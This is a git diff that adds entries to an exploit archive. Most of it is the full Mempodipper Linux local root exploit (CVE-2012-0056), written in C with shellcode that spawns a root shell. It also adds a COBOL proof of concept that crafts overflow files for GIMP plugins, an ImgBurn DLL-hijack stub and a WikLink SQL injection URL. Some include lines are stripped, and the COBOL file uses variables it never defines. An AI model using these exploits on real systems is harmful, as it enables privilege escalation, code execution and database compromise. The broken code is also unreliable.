diff --git a/files.csv b/files.csv
index cd728932c..096de86f8 100755
--- a/files.csv
+++ b/files.csv
@@ -31669,3 +31669,8 @@ id,file,description,date,author,platform,type,port
35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0
35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0
35158,platforms/windows/dos/35158.py,"Mongoose 2.11 'Content-Length' HTTP Header Remote Denial Of Service Vulnerability",2010-12-27,JohnLeitch,windows,dos,0
+35161,platforms/linux/local/35161.txt,"Linux Local Root => 2.6.39 (32-bit & 64-bit) - Mempodipper #2",2012-01-12,zx2c4,linux,local,0
+35162,platforms/linux/dos/35162.cob,"GIMP <= 2.6.7 Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0
+35163,platforms/windows/dos/35163.c,"ImgBurn 2.4 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-01-01,d3c0der,windows,dos,0
+35164,platforms/php/dos/35164.php,"PHP <= 5.3.2 'zend_strtod()' Function Floating-Point Value Denial of Service Vulnerability",2011-01-03,"Rick Regan",php,dos,0
+35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 'getURL.php' SQL Injection Vulnerability",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0
diff --git a/platforms/linux/dos/35162.cob b/platforms/linux/dos/35162.cob
new file mode 100755
index 000000000..e4c97f1bc
--- /dev/null
+++ b/platforms/linux/dos/35162.cob
@@ -0,0 +1,162 @@
+source: http://www.securityfocus.com/bid/45647/info
+
+GIMP is prone to multiple remote stack-based buffer-overflow vulnerabilities because it fails to perform adequate checks on user-supplied input.
+
+Successfully exploiting these issues may allow remote attackers to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+GIMP 2.6.11 is vulnerable; other versions may also be affected.
+
+000010 IDENTIFICATION DIVISION.
+000020 PROGRAM-ID. GIMP-OVERFLOWS-POC-IN-COBOL.
+000030 AUTHOR. NON-CUSTOMERS CREW.
+000040*SHOE SIZE DECLARATION. 43.
+000050
+000060 ENVIRONMENT DIVISION.
+000070 INPUT-OUTPUT SECTION.
+000080 FILE-CONTROL.
+000090 SELECT FILE01 ASSIGN TO "GIMP01.LIGHTINGPRESETS"
+000100 ORGANIZATION IS LINE SEQUENTIAL.
+000110 SELECT FILE02 ASSIGN TO "GIMP02.SPHEREDESIGNER"
+000120 ORGANIZATION IS LINE SEQUENTIAL.
+000130 SELECT FILE03 ASSIGN TO "GIMP03.GFIG"
+000140 ORGANIZATION IS LINE SEQUENTIAL.
+000150* FOR THE 4TH OVERFLOW, SEE BELOW.
+000160
+000170 DATA DIVISION.
+000180 FILE SECTION.
+000190 FD FILE01.
+000200 01 PRINTLINE PIC X(800).
+000210 FD FILE02.
+000220 01 QRINTLINE PIC X(800).
+000230 FD FILE03.
+000240 01 RRINTLINE PIC X(800).
+000250
+000260 WORKING-STORAGE SECTION.
+000270 01 TEXT-OUT1 PIC X(29) VALUE 'Number of lights: 1'.
+000280 01 TEXT-OUT2 PIC X(29) VALUE 'Type: Point'.
+000290 01 TEXT-OUT3 PIC X(29) VALUE 'Position: A'.
+000300 01 TEXT-OUT4 PIC X(29) VALUE 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
+000310 01 TEXT-OUT5 PIC X(29) VALUE ' -1 1'.
+000320 01 TEXT-OUT6 PIC X(29) VALUE 'Direction: -1 -1 1'.
+000330 01 TEXT-OUT7 PIC X(29) VALUE 'Color: 1 1 1'.
+000340 01 TEXT-OUT8 PIC X(29) VALUE 'Intensity: 1'.
+000350 01 TEXU-OUT1 PIC X(29) VALUE '0 0 A'.
+000360 01 TEXU-OUT2 PIC X(29) VALUE 'A 1 1 1 0 0 0 1 1 0 1 1 1 1 1'.
+000370 01 TEXU-OUT3 PIC X(29) VALUE '0 0 0 0 0 0 0'.
+000380 01 TEXV-OUT1 PIC X(29) VALUE 'GFIG Version 0.2'.
+000390 01 TEXV-OUT2 PIC X(29) VALUE 'Name: First\040Gfig'.
+000400 01 TEXV-OUT3 PIC X(29) VALUE 'Version: 0.000000'.
+000410 01 TEXV-OUT4 PIC X(29) VALUE 'ObjCount: 0'.
+000420 01 TEXV-OUT5 PIC X(29) VALUE ''.
+000430 01 TEXV-OUT6 PIC X(29) VALUE 'GridSpacing: 30'.
+000440 01 TEXV-OUT7 PIC X(29) VALUE 'GridType: RECT_GRID'.
+000450 01 TEXV-OUT8 PIC X(29) VALUE 'DrawGrid: FALSE'.
+000460 01 TEXV-OUT9 PIC X(29) VALUE 'Snap2Grid: FALSE'.
+000470 01 TEXV-OUTA PIC X(29) VALUE 'LockOnGrid: FALSE'.
+000480 01 TEXV-OUTB PIC X(29) VALUE 'ShowControl: TRUE'.
+000490 01 TEXV-OUTC PIC X(29) VALUE ''.
+000500 01 TEXV-OUTD PIC X(29) VALUE ''.
+000610
+000620 PROCEDURE DIVISION.
+000630 MAIN-PARAGRAPH.
+000640* 1. FILTERS > LIGHT AND SHADOW > LIGHTING EFFECTS > LIGHT > OPEN
+000650 OPEN OUTPUT FILE01.
+000660 WRITE PRINTLINE FROM TEXT-OUT1.
+000670 WRITE PRINTLINE FROM TEXT-OUT2.
+000680 WRITE PRINTLINE FROM TEXT-OUT3 AFTER ADVANCING 0 LINES.
+000690 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000700 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000710 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000720 WRITE PRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000730 WRITE PRINTLINE FROM TEXT-OUT5.
+000740 WRITE PRINTLINE FROM TEXT-OUT6.
+000750 WRITE PRINTLINE FROM TEXT-OUT7.
+000760 WRITE PRINTLINE FROM TEXT-OUT8.
+000770 CLOSE FILE01.
+000780
+000790* 2. FILTERS > RENDER > SPHERE DESIGNER > OPEN
+000800 OPEN OUTPUT FILE02.
+000810 WRITE QRINTLINE FROM TEXU-OUT1 AFTER ADVANCING 0 LINES.
+000820 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000830 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000840 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000850 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000860 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000870 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000880 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000890 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000900 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000910 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000920 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000930 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000940 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000950 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000960 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000970 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000980 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+000990 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001000 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001010 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001020 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001030 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001040 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001050 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001060 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001070 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001080 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001090 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001100 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001110 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001120 WRITE QRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001130 WRITE QRINTLINE FROM TEXU-OUT2 AFTER ADVANCING 0 LINES.
+001140 WRITE QRINTLINE FROM TEXU-OUT3.
+001150 CLOSE FILE02.
+001160
+001170* 3. FILTERS > RENDER > GFIG > FILE > OPEN
+001180 OPEN OUTPUT FILE03.
+001190 WRITE RRINTLINE FROM TEXV-OUT1.
+001200 WRITE RRINTLINE FROM TEXV-OUT2.
+001210 WRITE RRINTLINE FROM TEXV-OUT3.
+001220 WRITE RRINTLINE FROM TEXV-OUT4.
+001230 WRITE RRINTLINE FROM TEXV-OUT5.
+001240 WRITE RRINTLINE FROM TEXV-OUT6.
+001250 WRITE RRINTLINE FROM TEXV-OUT7.
+001260 WRITE RRINTLINE FROM TEXV-OUT8.
+001270 WRITE RRINTLINE FROM TEXV-OUT9.
+001280 WRITE RRINTLINE FROM TEXV-OUTA.
+001290 WRITE RRINTLINE FROM TEXV-OUTB.
+001300 WRITE RRINTLINE FROM TEXV-OUTC.
+001310 WRITE RRINTLINE FROM TEXV-OUTD.
+001320 WRITE RRINTLINE FROM TEXV-OUTE.
+001330 WRITE RRINTLINE FROM TEXV-OUTF.
+001340 WRITE RRINTLINE FROM TEXV-OUTG.
+001350 WRITE RRINTLINE FROM TEXV-OUTH.
+001360 WRITE RRINTLINE FROM TEXV-OUTI.
+001370 WRITE RRINTLINE FROM TEXV-OUTJ.
+001380 WRITE RRINTLINE FROM TEXV-OUTK AFTER ADVANCING 0 LINES.
+001390 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001400 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001410 WRITE RRINTLINE FROM TEXT-OUT4 AFTER ADVANCING 0 LINES.
+001420 WRITE RRINTLINE FROM TEXV-OUTL.
+001430 WRITE RRINTLINE FROM TEXV-OUTM.
+001440 WRITE RRINTLINE FROM TEXV-OUTN.
+001450 CLOSE FILE03.
+001460
+001470* 4. THE FUNCTION "read_channel_data()" IN plug-ins/common/file-psp.c HAS AN
+001480* OVERFLOW WHEN HANDLING PSP_COMP_RLE TYPE FILES. A MALICIOUS FILE THAT
+001490* STARTS A LONG RUNCOUNT AT THE END OF AN IMAGE WILL WRITE OUTSIDE OF
+001500* ALLOCATED MEMORY. WE DON'T HAVE A POC FOR THIS BUG.
+001510
+001520* HAPPY NEW YEAR!!! http://rock-madrid.com/
+001530
+001540 STOP RUN.
diff --git a/platforms/linux/local/35161.txt b/platforms/linux/local/35161.txt
new file mode 100755
index 000000000..e9e924e29
--- /dev/null
+++ b/platforms/linux/local/35161.txt
@@ -0,0 +1,291 @@
+/*Exploit code is here: http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c
+Blog post about it is here: http://blog.zx2c4.com/749
+*/
+
+/*
+ * Mempodipper
+ * by zx2c4
+ *
+ * Linux Local Root Exploit
+ *
+ * Rather than put my write up here, per usual, this time I've put it
+ * in a rather lengthy blog post: http://blog.zx2c4.com/749
+ *
+ * Enjoy.
+ *
+ * - zx2c4
+ * Jan 21, 2012
+ *
+ * CVE-2012-0056
+ */
+
+#define _LARGEFILE64_SOURCE
+#define _GNU_SOURCE
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+char *prog_name;
+
+int send_fd(int sock, int fd)
+{
+ char buf[1];
+ struct iovec iov;
+ struct msghdr msg;
+ struct cmsghdr *cmsg;
+ int n;
+ char cms[CMSG_SPACE(sizeof(int))];
+
+ buf[0] = 0;
+ iov.iov_base = buf;
+ iov.iov_len = 1;
+
+ memset(&msg, 0, sizeof msg);
+ msg.msg_iov = &iov;
+ msg.msg_iovlen = 1;
+ msg.msg_control = (caddr_t)cms;
+ msg.msg_controllen = CMSG_LEN(sizeof(int));
+
+ cmsg = CMSG_FIRSTHDR(&msg);
+ cmsg->cmsg_len = CMSG_LEN(sizeof(int));
+ cmsg->cmsg_level = SOL_SOCKET;
+ cmsg->cmsg_type = SCM_RIGHTS;
+ memmove(CMSG_DATA(cmsg), &fd, sizeof(int));
+
+ if ((n = sendmsg(sock, &msg, 0)) != iov.iov_len)
+ return -1;
+ close(sock);
+ return 0;
+}
+
+int recv_fd(int sock)
+{
+ int n;
+ int fd;
+ char buf[1];
+ struct iovec iov;
+ struct msghdr msg;
+ struct cmsghdr *cmsg;
+ char cms[CMSG_SPACE(sizeof(int))];
+
+ iov.iov_base = buf;
+ iov.iov_len = 1;
+
+ memset(&msg, 0, sizeof msg);
+ msg.msg_name = 0;
+ msg.msg_namelen = 0;
+ msg.msg_iov = &iov;
+ msg.msg_iovlen = 1;
+
+ msg.msg_control = (caddr_t)cms;
+ msg.msg_controllen = sizeof cms;
+
+ if ((n = recvmsg(sock, &msg, 0)) < 0)
+ return -1;
+ if (n == 0)
+ return -1;
+ cmsg = CMSG_FIRSTHDR(&msg);
+ memmove(&fd, CMSG_DATA(cmsg), sizeof(int));
+ close(sock);
+ return fd;
+}
+
+unsigned long ptrace_address()
+{
+ int fd[2];
+ printf("[+] Creating ptrace pipe.\n");
+ pipe(fd);
+ fcntl(fd[0], F_SETFL, O_NONBLOCK);
+
+ printf("[+] Forking ptrace child.\n");
+ int child = fork();
+ if (child) {
+ close(fd[1]);
+ char buf;
+ printf("[+] Waiting for ptraced child to give output on syscalls.\n");
+ for (;;) {
+ wait(NULL);
+ if (read(fd[0], &buf, 1) > 0)
+ break;
+ ptrace(PTRACE_SYSCALL, child, NULL, NULL);
+ }
+
+ printf("[+] Error message written. Single stepping to find address.\n");
+ struct user_regs_struct regs;
+ for (;;) {
+ ptrace(PTRACE_SINGLESTEP, child, NULL, NULL);
+ wait(NULL);
+ ptrace(PTRACE_GETREGS, child, NULL, ®s);
+#if defined(__i386__)
+#define instruction_pointer regs.eip
+#define upper_bound 0xb0000000
+#elif defined(__x86_64__)
+#define instruction_pointer regs.rip
+#define upper_bound 0x700000000000
+#else
+#error "That platform is not supported."
+#endif
+ if (instruction_pointer < upper_bound) {
+ unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL);
+ if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */)
+ return instruction_pointer;
+ }
+ }
+ } else {
+ printf("[+] Ptrace_traceme'ing process.\n");
+ if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) < 0) {
+ perror("[-] ptrace");
+ return 0;
+ }
+ close(fd[0]);
+ dup2(fd[1], 2);
+ execl("/bin/su", "su", "not-a-valid-user", NULL);
+ }
+ return 0;
+}
+
+unsigned long objdump_address()
+{
+ FILE *command = popen("objdump -d /bin/su|grep ''|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\\([^0]*\\)/0x\\1/'", "r");
+ if (!command) {
+ perror("[-] popen");
+ return 0;
+ }
+ char result[32];
+ fgets(result, 32, command);
+ pclose(command);
+ return strtoul(result, NULL, 16);
+}
+
+unsigned long find_address()
+{
+ printf("[+] Ptracing su to find next instruction without reading binary.\n");
+ unsigned long address = ptrace_address();
+ if (!address) {
+ printf("[-] Ptrace failed.\n");
+ printf("[+] Reading su binary with objdump to find exit@plt.\n");
+ address = objdump_address();
+ if (address == ULONG_MAX || !address) {
+ printf("[-] Could not resolve /bin/su. Specify the exit@plt function address manually.\n");
+ printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
+ exit(-1);
+ }
+ }
+ printf("[+] Resolved call address to 0x%lx.\n", address);
+ return address;
+}
+
+int su_padding()
+{
+ printf("[+] Calculating su padding.\n");
+ FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
+ if (!command) {
+ perror("[-] popen");
+ exit(1);
+ }
+ char result[256];
+ fgets(result, 256, command);
+ pclose(command);
+ return strstr(result, "this-user-does-not-exist") - result;
+}
+
+int child(int sock)
+{
+ char parent_mem[256];
+ sprintf(parent_mem, "/proc/%d/mem", getppid());
+ printf("[+] Opening parent mem %s in child.\n", parent_mem);
+ int fd = open(parent_mem, O_RDWR);
+ if (fd < 0) {
+ perror("[-] open");
+ return 1;
+ }
+ printf("[+] Sending fd %d to parent.\n", fd);
+ send_fd(sock, fd);
+ return 0;
+}
+
+int parent(unsigned long address)
+{
+ int sockets[2];
+ printf("[+] Opening socketpair.\n");
+ if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
+ perror("[-] socketpair");
+ return 1;
+ }
+ if (fork()) {
+ printf("[+] Waiting for transferred fd in parent.\n");
+ int fd = recv_fd(sockets[1]);
+ printf("[+] Received fd at %d.\n", fd);
+ if (fd < 0) {
+ perror("[-] recv_fd");
+ return 1;
+ }
+ printf("[+] Assigning fd %d to stderr.\n", fd);
+ dup2(2, 15);
+ dup2(fd, 2);
+
+ unsigned long offset = address - su_padding();
+ printf("[+] Seeking to offset 0x%lx.\n", offset);
+ lseek64(fd, offset, SEEK_SET);
+
+#if defined(__i386__)
+ // See shellcode-32.s in this package for the source.
+ char shellcode[] =
+ "\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
+ "\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
+ "\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
+ "\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
+ "\x80";
+#elif defined(__x86_64__)
+ // See shellcode-64.s in this package for the source.
+ char shellcode[] =
+ "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
+ "\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
+ "\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
+ "\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
+ "\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
+#else
+#error "That platform is not supported."
+#endif
+ printf("[+] Executing su with shellcode.\n");
+ execl("/bin/su", "su", shellcode, NULL);
+ } else {
+ char sock[32];
+ sprintf(sock, "%d", sockets[0]);
+ printf("[+] Executing child from child fork.\n");
+ execl("/proc/self/exe", prog_name, "-c", sock, NULL);
+ }
+ return 0;
+}
+
+int main(int argc, char **argv)
+{
+ prog_name = argv[0];
+
+ if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
+ return child(atoi(argv[2]));
+
+ printf("===============================\n");
+ printf("= Mempodipper =\n");
+ printf("= by zx2c4 =\n");
+ printf("= Jan 21, 2012 =\n");
+ printf("===============================\n\n");
+
+ if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
+ return parent(strtoul(argv[2], NULL, 16));
+ else
+ return parent(find_address());
+
+}
\ No newline at end of file
diff --git a/platforms/php/dos/35164.php b/platforms/php/dos/35164.php
new file mode 100755
index 000000000..3ae95b838
--- /dev/null
+++ b/platforms/php/dos/35164.php
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45668/info
+
+PHP is prone to a remote denial-of-service vulnerability.
+
+Successful attacks will cause applications written in PHP to hang, creating a denial-of-service condition.
+
+PHP 5.3.3 is vulnerable; other versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/35165.txt b/platforms/php/webapps/35165.txt
new file mode 100755
index 000000000..8ad8ed2b3
--- /dev/null
+++ b/platforms/php/webapps/35165.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45673/info
+
+WikLink is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+WikLink 0.1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wiklink/getURL.php?id=-1' union select 1111/*
\ No newline at end of file
diff --git a/platforms/windows/dos/35163.c b/platforms/windows/dos/35163.c
new file mode 100755
index 000000000..3d9e022af
--- /dev/null
+++ b/platforms/windows/dos/35163.c
@@ -0,0 +1,19 @@
+source: http://www.securityfocus.com/bid/45657/info
+
+ImgBurn is prone to an arbitrary-code-execution vulnerability.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
+
+ImgBurn 2.4.0.0 is vulnerable; other versions may also be affected.
+
+#include
+#define DllExport __declspec (dllexport)
+DllExport void DwmSetWindowAttribute() { egg(); }
+
+int egg()
+{
+ system ("calc");
+ exit(0);
+ return 0;
+}
+